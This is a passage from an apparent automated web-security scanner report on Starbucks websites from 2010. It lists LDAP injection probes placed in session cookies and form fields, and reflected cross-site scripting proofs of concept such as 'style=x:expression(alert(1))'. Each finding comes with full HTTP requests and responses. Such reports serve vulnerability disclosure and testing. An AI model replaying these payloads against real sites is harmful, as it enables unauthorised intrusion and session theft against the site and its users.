<table><tr><td><input name="keywords" value="keyword or item#" id="txtLocation" size="29" style="height: 22" ONFOCUS="javascript:ClearTextBox(document.searchform.keywords,'keyword or item#');">
</td><td style="
...[SNIP]...

Request 2

GET / HTTP/1.1
Host: www.starbucksstore.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CCVC=Version=1%2E0&ID=1; CCREFID=Version=1%2E0&ID=http%3A%2F%2Fwww%2Estarbucks%2Ecom%2Fcoffee%2Fvia%2Fflavored%2Dcoffee; SITESERVER=Version=1%2E0&ID=29BB94B7790042E690D3142F9FDF2C8C; ASPSESSIONIDACABBACA=b04135e4d2d6b331)!(sn=*; ASPSESSIONIDCCDDADAA=GOPJDLCBKEOEKEKNCNEFKIHA; CookingAd=CCADATE=20101116&CCAID=SBPTPAHP1SHTB;

Response 2

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 21174
Content-Type: text/html
Server: Microsoft-IIS/7.0
Set-Cookie: ASPSESSIONIDACABBACA=HOJMDLCBHPPELAMPENAAECCJ; path=/
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 18:36:30 GMT
Connection: close

<!--S1--><!--S0-->        
   <link href="/include/sitenew.css" type="text/css" rel="StyleSheet">
   <meta HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=ISO-8859-1">
   <meta name="description" content="Find every Starbucks Coffee at the Official Online Store.">
   <meta name="keywords" content="Coffee, Starbucks Coffee, whole bean coffee, ground coffee, decaffeinated coffee, instant coffee, VIA,Tazo tea">
   

   <script src="/include/LibJavaScript.js" type="text/javascript"></script>
<title>
Starbucks Coffee - Coffee Beans, Espresso Pods, VIA, and House Blend at Starbucks Store
</title>

</head>    
<body id="home">
<div id="omniture">

</div>
   <div id="container">
       <div id="header">
<h1><a id="logo" href="http://www.starbucksstore.com/">Starbucks Store</a></h1>
<ul id="utilities">
<li><a href="http://www.starbucks.com" target="_blank">Starbucks Home</a>.</li>
<li><a href="http://www.starbucks.com/retail/find/default.aspx" target="_blank">Our Stores</a>.</li>
<li><a href="http://www.starbucks.com/aboutus/" target="_blank">About Us</a></li>
</ul>
<div id="locator">
<div class="accountlinks"><a href="http://www.starbucksstore.com/mya/links.asp">My Account</a>&nbsp;&nbsp;.&nbsp;&nbsp;<a href="http://www.starbucksstore.com/shopping">Cart</a>&nbsp;&nbsp;.&nbsp;&nbsp;<a href="http://www.starbucksstore.com/mya/track.asp">Order Status</a>&nbsp;&nbsp;.&nbsp;&nbsp;<a href="http://www.starbucksstore.com/guestassist/shcontus.asp">Help</a></div>
<h2><label for="txtLocation"><b>Search the Starbucks Store</b></label></h2>
<form method="get" action="http://www.starbucksstore.com/products/include/SearchNav.asp" name="searchform">
<input type="hidden" name="search" value="Products">
<table><tr><td><input name="keywords" value="keyword or item#" id="txtLocation" size="29" style="height: 22" ONFOCUS="javascript:ClearTextBox(do
...[SNIP]...

2.2. http://www.starbucksstore.com/aff/adredir.asp [ASPSESSIONIDACABBACA cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.starbucksstore.com
Path:   /aff/adredir.asp

Issue detail

The ASPSESSIONIDACABBACA cookie appears to be vulnerable to LDAP injection attacks.

The payloads 1a18fdd9ce30786c)(sn=* and 1a18fdd9ce30786c)!(sn=* were each submitted in the ASPSESSIONIDACABBACA cookie. These two requests resulted in different responses, indicating that the input may be being incorporated into a disjunctive LDAP query in an unsafe manner.

Request 1

GET /aff/adredir.asp?CCAID=SBPTPAHP1SHTUM&Redir=%2Fproducts%2Fshprodli%2Easp%3FDeptNo%3D8100%26ClassNo%3D0035%26SubClassNo%3D0262%26cpnum%3DDRINKWARE HTTP/1.1
Host: www.starbucksstore.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CCVC=Version=1%2E0&ID=1; CCREFID=Version=1%2E0&ID=http%3A%2F%2Fwww%2Estarbucks%2Ecom%2Fcoffee%2Fvia%2Fflavored%2Dcoffee; SITESERVER=Version=1%2E0&ID=29BB94B7790042E690D3142F9FDF2C8C; ASPSESSIONIDACABBACA=1a18fdd9ce30786c)(sn=*; ASPSESSIONIDCCDDADAA=GOPJDLCBKEOEKEKNCNEFKIHA; CookingAd=CCADATE=20101116&CCAID=SBPTPAHP1SHTB;

Response 1

HTTP/1.1 302 Object moved
Cache-Control: private
Content-Length: 351
Content-Type: text/html
Location: /products/shprodli.asp?DeptNo=8100&ClassNo=0035&SubClassNo=0262&cpnum=DRINKWARE&CCAID=SBPTPAHP1SHTUM&Redir=/products/shprodli.asp?DeptNo=8100&amp;ClassNo=0035&amp;SubClassNo=0262&amp;cpnum=DRINKWARE
Server: Microsoft-IIS/7.0
Set-Cookie: CookingAd=CCREF=&CCADATE=20101116&CCAID=SBPTPAHP1SHTUM; expires=Thu, 16-Dec-2010 08:00:00 GMT; path=/
Set-Cookie: ASPSESSIONIDACABBACA=HCKMDLCBEBEEIOJHOPIJIEII; path=/
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 18:36:39 GMT
Connection: close

<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="/products/shprodli.asp?DeptNo=8100&amp;ClassNo=0035&amp;SubClassNo=0262&amp;cpnum=DRINKWARE&amp;CCAID=SBPTPAHP1SHTUM&amp;Redir=/products/shprodli.asp?DeptNo=8100&amp;amp;ClassNo=0035&amp;amp;SubClassNo=0262&amp;amp;cpnum=DRINKWARE">here</a>.</body>

Request 2

GET /aff/adredir.asp?CCAID=SBPTPAHP1SHTUM&Redir=%2Fproducts%2Fshprodli%2Easp%3FDeptNo%3D8100%26ClassNo%3D0035%26SubClassNo%3D0262%26cpnum%3DDRINKWARE HTTP/1.1
Host: www.starbucksstore.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CCVC=Version=1%2E0&ID=1; CCREFID=Version=1%2E0&ID=http%3A%2F%2Fwww%2Estarbucks%2Ecom%2Fcoffee%2Fvia%2Fflavored%2Dcoffee; SITESERVER=Version=1%2E0&ID=29BB94B7790042E690D3142F9FDF2C8C; ASPSESSIONIDACABBACA=1a18fdd9ce30786c)!(sn=*; ASPSESSIONIDCCDDADAA=GOPJDLCBKEOEKEKNCNEFKIHA; CookingAd=CCADATE=20101116&CCAID=SBPTPAHP1SHTB;

Response 2

HTTP/1.1 302 Object moved
Cache-Control: private
Content-Length: 351
Content-Type: text/html
Location: /products/shprodli.asp?DeptNo=8100&ClassNo=0035&SubClassNo=0262&cpnum=DRINKWARE&CCAID=SBPTPAHP1SHTUM&Redir=/products/shprodli.asp?DeptNo=8100&amp;ClassNo=0035&amp;SubClassNo=0262&amp;cpnum=DRINKWARE
Server: Microsoft-IIS/7.0
Set-Cookie: CookingAd=CCREF=&CCADATE=20101116&CCAID=SBPTPAHP1SHTUM; expires=Thu, 16-Dec-2010 08:00:00 GMT; path=/
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 18:36:39 GMT
Connection: close

<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="/products/shprodli.asp?DeptNo=8100&amp;ClassNo=0035&amp;SubClassNo=0262&amp;cpnum=DRINKWARE&amp;CCAID=SBPTPAHP1SHTUM&amp;Redir=/products/shprodli.asp?DeptNo=8100&amp;amp;ClassNo=0035&amp;amp;SubClassNo=0262&amp;amp;cpnum=DRINKWARE">here</a>.</body>

2.3. http://www.starbucksstore.com/coffee-machines/ [ASPSESSIONIDCCDDADAA cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.starbucksstore.com
Path:   /coffee-machines/

Issue detail

The ASPSESSIONIDCCDDADAA cookie appears to be vulnerable to LDAP injection attacks.

The payloads c20c2704323c6dbe)(sn=* and c20c2704323c6dbe)!(sn=* were each submitted in the ASPSESSIONIDCCDDADAA cookie. These two requests resulted in different responses, indicating that the input may be being incorporated into a disjunctive LDAP query in an unsafe manner.

Request 1

GET /coffee-machines/?CCAID=SBPTPAHPODEA HTTP/1.1
Host: www.starbucksstore.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CCVC=Version=1%2E0&ID=1; CCREFID=Version=1%2E0&ID=http%3A%2F%2Fwww%2Estarbucks%2Ecom%2Fcoffee%2Fvia%2Fflavored%2Dcoffee; SITESERVER=Version=1%2E0&ID=29BB94B7790042E690D3142F9FDF2C8C; ASPSESSIONIDACABBACA=OKBMDLCBGJFNOPGDEIPJMFNK; ASPSESSIONIDCCDDADAA=c20c2704323c6dbe)(sn=*; CookingAd=CCADATE=20101116&CCAID=SBPTPAHP1SHTB;

Response 1

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 21102
Content-Type: text/html
Server: Microsoft-IIS/7.0
Set-Cookie: CookingAd=CCADATE=20101116&CCAID=SBPTPAHPODEA; expires=Thu, 16-Dec-2010 08:00:00 GMT; path=/
Set-Cookie: ASPSESSIONIDCCDDADAA=GJHKDLCBKFNCFHEOPBDCFKDD; path=/
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 18:36:35 GMT
Connection: close

<!--S1--><!--S0-->

<html>
   <head>    
       <link REL="StyleSheet" HREF="/include/sitenew.css" TYPE="text/css">
       <meta HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=ISO-8859-1">
       <meta name="description" content="Shop for Coffee Machines, Espresso Machines and more at Starbucks Store">
       <meta name="keywords" content="coffee machines, espresso machines">    

       <script src="/include/LibJavaScript.js" type="text/javascript"></script>
       <title>Coffee Machines at Starbucks Store</title>

</head>    
<body id="equipment">
<div id="omniture">

</div>
   <div id="container">
       <div id="header">
<h1><a id="logo" href="http://www.starbucksstore.com/">Starbucks Store</a></h1>
<ul id="utilities">
<li><a href="http://www.starbucks.com" target="_blank">Starbucks Home</a>.</li>
<li><a href="http://www.starbucks.com/retail/find/default.aspx" target="_blank">Our Stores</a>.</li>
<li><a href="http://www.starbucks.com/aboutus/" target="_blank">About Us</a></li>
</ul>
<div id="locator">
<div class="accountlinks"><a href="http://www.starbucksstore.com/mya/links.asp">My Account</a>&nbsp;&nbsp;.&nbsp;&nbsp;<a href="http://www.starbucksstore.com/shopping">Cart</a>&nbsp;&nbsp;.&nbsp;&nbsp;<a href="http://www.starbucksstore.com/mya/track.asp">Order Status</a>&nbsp;&nbsp;.&nbsp;&nbsp;<a href="http://www.starbucksstore.com/guestassist/shcontus.asp">Help</a></div>
<h2><label for="txtLocation"><b>Search the Starbucks Store</b></label></h2>
<form method="get" action="http://www.starbucksstore.com/products/include/SearchNav.asp" name="searchform">
<input type="hidden" name="search" value="Products">
<table><tr><td><input name="keywords" value="keyword or item#" id="txtLocation" size="29" style="height: 22" ONFOCUS="java
...[SNIP]...

Request 2

GET /coffee-machines/?CCAID=SBPTPAHPODEA HTTP/1.1
Host: www.starbucksstore.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CCVC=Version=1%2E0&ID=1; CCREFID=Version=1%2E0&ID=http%3A%2F%2Fwww%2Estarbucks%2Ecom%2Fcoffee%2Fvia%2Fflavored%2Dcoffee; SITESERVER=Version=1%2E0&ID=29BB94B7790042E690D3142F9FDF2C8C; ASPSESSIONIDACABBACA=OKBMDLCBGJFNOPGDEIPJMFNK; ASPSESSIONIDCCDDADAA=c20c2704323c6dbe)!(sn=*; CookingAd=CCADATE=20101116&CCAID=SBPTPAHP1SHTB;

Response 2

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 21102
Content-Type: text/html
Server: Microsoft-IIS/7.0
Set-Cookie: CookingAd=CCADATE=20101116&CCAID=SBPTPAHPODEA; expires=Thu, 16-Dec-2010 08:00:00 GMT; path=/
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 18:36:35 GMT
Connection: close

<!--S1--><!--S0-->

<html>
   <head>    
       <link REL="StyleSheet" HREF="/include/sitenew.css" TYPE="text/css">
       <meta HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=ISO-8859-1">
       <meta name="description" content="Shop for Coffee Machines, Espresso Machines and more at Starbucks Store">
       <meta name="keywords" content="coffee machines, espresso machines">    

       <script src="/include/LibJavaScript.js" type="text/javascript"></script>
       <title>Coffee Machines at Starbucks Store</title>

</head>    
<body id="equipment">
<div id="omniture">

</div>
   <div id="container">
       <div id="header">
<h1><a id="logo" href="http://www.starbucksstore.com/">Starbucks Store</a></h1>
<ul id="utilities">
<li><a href="http://www.starbucks.com" target="_blank">Starbucks Home</a>.</li>
<li><a href="http://www.starbucks.com/retail/find/default.aspx" target="_blank">Our Stores</a>.</li>
<li><a href="http://www.starbucks.com/aboutus/" target="_blank">About Us</a></li>
</ul>
<div id="locator">
<div class="accountlinks"><a href="http://www.starbucksstore.com/mya/links.asp">My Account</a>&nbsp;&nbsp;.&nbsp;&nbsp;<a href="http://www.starbucksstore.com/shopping">Cart</a>&nbsp;&nbsp;.&nbsp;&nbsp;<a href="http://www.starbucksstore.com/mya/track.asp">Order Status</a>&nbsp;&nbsp;.&nbsp;&nbsp;<a href="http://www.starbucksstore.com/guestassist/shcontus.asp">Help</a></div>
<h2><label for="txtLocation"><b>Search the Starbucks Store</b></label></h2>
<form method="get" action="http://www.starbucksstore.com/products/include/SearchNav.asp" name="searchform">
<input type="hidden" name="search" value="Products">
<table><tr><td><input name="keywords" value="keyword or item#" id="txtLocation" size="29" style="height: 22" ONFOCUS="javascript:ClearTextBox(document.searchform.keywords,'keyword or item#'
...[SNIP]...

2.4. http://www.starbucksstore.com/guestassist/shgaform.asp [EMail.x parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.starbucksstore.com
Path:   /guestassist/shgaform.asp

Issue detail

The EMail.x parameter appears to be vulnerable to LDAP injection attacks.

The payloads *)(sn=* and *)!(sn=* were each submitted in the EMail.x parameter. These two requests resulted in different responses, indicating that the input may be being incorporated into a conjunctive LDAP query in an unsafe manner.

Request 1

POST /guestassist/shgaform.asp HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Referer: http://www.starbucksstore.com/guestassist/shcontus.asp
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Host: www.starbucksstore.com
Proxy-Connection: Keep-Alive
Pragma: no-cache
Cookie: CookingAd=CCADATE=20101116&CCAID=SBPTPAHP1SHTB; CCVC=Version=1%2E0&ID=1; CCREFID=Version=1%2E0&ID=http%3A%2F%2Fwww%2Estarbucks%2Ecom%2Fcoffee%2Fvia%2Fflavored%2Dcoffee; SITESERVER=Version=1%2E0&ID=29BB94B7790042E690D3142F9FDF2C8C; ASPSESSIONIDCCDDADAA=GOPJDLCBKEOEKEKNCNEFKIHA; ASPSESSIONIDACABBACA=OKBMDLCBGJFNOPGDEIPJMFNK; ASPSESSIONIDACACCDBA=LNFLDLCBOHDNPNFKEGCPKHPK
Content-Length: 54

cboSubjects=1000&cboSubTopics=100&EMail.x=*)(sn=*&EMail.y=7

Response 1

HTTP/1.1 302 Object moved
Cache-Control: private
Content-Length: 164
Content-Type: text/html
Location: /guestassist/shcontus.asp?error=noselection
Server: Microsoft-IIS/7.0
Set-Cookie: ASPSESSIONIDSAADCCCB=MPCAELCBIKHIIOECBLPILHFA; path=/
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 20:24:51 GMT

<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="/guestassist/shcontus.asp?error=noselection">here</a>.</body>

Request 2

POST /guestassist/shgaform.asp HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Referer: http://www.starbucksstore.com/guestassist/shcontus.asp
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Host: www.starbucksstore.com
Proxy-Connection: Keep-Alive
Pragma: no-cache
Cookie: CookingAd=CCADATE=20101116&CCAID=SBPTPAHP1SHTB; CCVC=Version=1%2E0&ID=1; CCREFID=Version=1%2E0&ID=http%3A%2F%2Fwww%2Estarbucks%2Ecom%2Fcoffee%2Fvia%2Fflavored%2Dcoffee; SITESERVER=Version=1%2E0&ID=29BB94B7790042E690D3142F9FDF2C8C; ASPSESSIONIDCCDDADAA=GOPJDLCBKEOEKEKNCNEFKIHA; ASPSESSIONIDACABBACA=OKBMDLCBGJFNOPGDEIPJMFNK; ASPSESSIONIDACACCDBA=LNFLDLCBOHDNPNFKEGCPKHPK
Content-Length: 54

cboSubjects=1000&cboSubTopics=100&EMail.x=*)!(sn=*&EMail.y=7

Response 2

HTTP/1.1 302 Object moved
Cache-Control: private
Content-Length: 164
Content-Type: text/html
Location: /guestassist/shcontus.asp?error=noselection
Server: Microsoft-IIS/7.0
Set-Cookie: ASPSESSIONIDSCDCCADA=EODAELCBBDPKJGHJDMNGKJDP; path=/
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 20:24:52 GMT

<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="/guestassist/shcontus.asp?error=noselection">here</a>.</body>

3. Cross-site scripting (reflected)  previous  next
There are 108 instances of this issue:

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Issue remediation

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defenses:In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.


3.1. http://www.starbucks.com/ [8af12"style%3d"x%3aexpression(alert(1))"9f35c014f5e parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /

Issue detail

The value of the 8af12"style%3d"x%3aexpression(alert(1))"9f35c014f5e request parameter is copied into the value of an HTML tag attribute which is not encapsulated in any quotation marks. The payload 69adb%20style%3dx%3aexpression(alert(1))%2021e0c039cae was submitted in the 8af12"style%3d"x%3aexpression(alert(1))"9f35c014f5e parameter. This input was echoed as 69adb style=x:expression(alert(1)) 21e0c039cae in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /?8af12"style%3d"x%3aexpression(alert(1))"9f35c014f5e=169adb%20style%3dx%3aexpression(alert(1))%2021e0c039cae HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive
Host: www.starbucks.com
Cookie: ASP.NET_SessionId=lxhjfy55caulusmym0jnh545; skin=

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 18:27:17 GMT
Content-Length: 41391

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">
<html
xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/s
...[SNIP]...
<param name="flashvars" value="playerType=homepage&amp;playlistID=69777476001&playerLocation=http://www.starbucks.com/?8af12"style="x:expression(alert(1))"9f35c014f5e=169adb style=x:expression(alert(1)) 21e0c039cae" />
...[SNIP]...

3.2. http://www.starbucks.com/ [8af12%22style%3d%22x%3aexpression(alert(1))%229f35c014f5e parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /

Issue detail

The value of the 8af12%22style%3d%22x%3aexpression(alert(1))%229f35c014f5e request parameter is copied into the value of an HTML tag attribute which is not encapsulated in any quotation marks. The payload 8974f%20style%3dx%3aexpression(alert(1))%20727be240e75 was submitted in the 8af12%22style%3d%22x%3aexpression(alert(1))%229f35c014f5e parameter. This input was echoed as 8974f style=x:expression(alert(1)) 727be240e75 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /?8af12%22style%3d%22x%3aexpression(alert(1))%229f35c014f5e=18974f%20style%3dx%3aexpression(alert(1))%20727be240e75 HTTP/1.1
Host: www.starbucks.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=246673883.1289931170.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=246673883.1144148522.1289931170.1289931170.1289931170.1; _chartbeat2=qspoj3z1snwoz3gj

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
Set-Cookie: ASP.NET_SessionId=eycnoc45avhu3vzohhihd4zf; path=/; HttpOnly
Set-Cookie: skin=; path=/
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 20:42:45 GMT
Content-Length: 41391

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">
<html
xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/s
...[SNIP]...
<param name="flashvars" value="playerType=homepage&amp;playlistID=69777476001&playerLocation=http://www.starbucks.com/?8af12"style="x:expression(alert(1))"9f35c014f5e=18974f style=x:expression(alert(1)) 727be240e75" />
...[SNIP]...

3.3. http://www.starbucks.com/ [8af12%22style%3d%22x:expression(alert(1))%229f35c014f5e parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /

Issue detail

The value of the 8af12%22style%3d%22x:expression(alert(1))%229f35c014f5e request parameter is copied into the value of an HTML tag attribute which is not encapsulated in any quotation marks. The payload 9d18d%20style%3dx%3aexpression(alert(1))%2099773d5c1aa was submitted in the 8af12%22style%3d%22x:expression(alert(1))%229f35c014f5e parameter. This input was echoed as 9d18d style=x:expression(alert(1)) 99773d5c1aa in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /?8af12%22style%3d%22x:expression(alert(1))%229f35c014f5e=19d18d%20style%3dx%3aexpression(alert(1))%2099773d5c1aa HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive
Host: www.starbucks.com

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
Set-Cookie: ASP.NET_SessionId=0luwrc55zxysed45zp5au455; path=/; HttpOnly
Set-Cookie: skin=; path=/
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 20:43:04 GMT
Content-Length: 41392

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">
<html
xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/s
...[SNIP]...
<param name="flashvars" value="playerType=homepage&amp;playlistID=69777476001&playerLocation=http://www.starbucks.com/?8af12"style="x:expression(alert(1))"9f35c014f5e=19d18d style=x:expression(alert(1)) 99773d5c1aa" />
...[SNIP]...

3.4. http://www.starbucks.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8af12"style%3d"x%3aexpression(alert(1))"9f35c014f5e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 8af12"style="x:expression(alert(1))"9f35c014f5e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /?8af12"style%3d"x%3aexpression(alert(1))"9f35c014f5e=1 HTTP/1.1
Host: www.starbucks.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
Set-Cookie: ASP.NET_SessionId=ntjkwoi4dh2ibi45qfgoseio; path=/; HttpOnly
Set-Cookie: skin=; path=/
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 18:15:04 GMT
Content-Length: 41208

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">
<html
xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/s
...[SNIP]...
<param name="flashvars" value="playerType=homepage&amp;playlistID=69777476001&playerLocation=http://www.starbucks.com/?8af12"style="x:expression(alert(1))"9f35c014f5e=1" />
...[SNIP]...

3.5. http://www.starbucks.com/about-us [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /about-us

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 949e3"style%3d"x%3aexpression(alert(1))"f35557201b0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 949e3"style="x:expression(alert(1))"f35557201b0 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /about-us?949e3"style%3d"x%3aexpression(alert(1))"f35557201b0=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
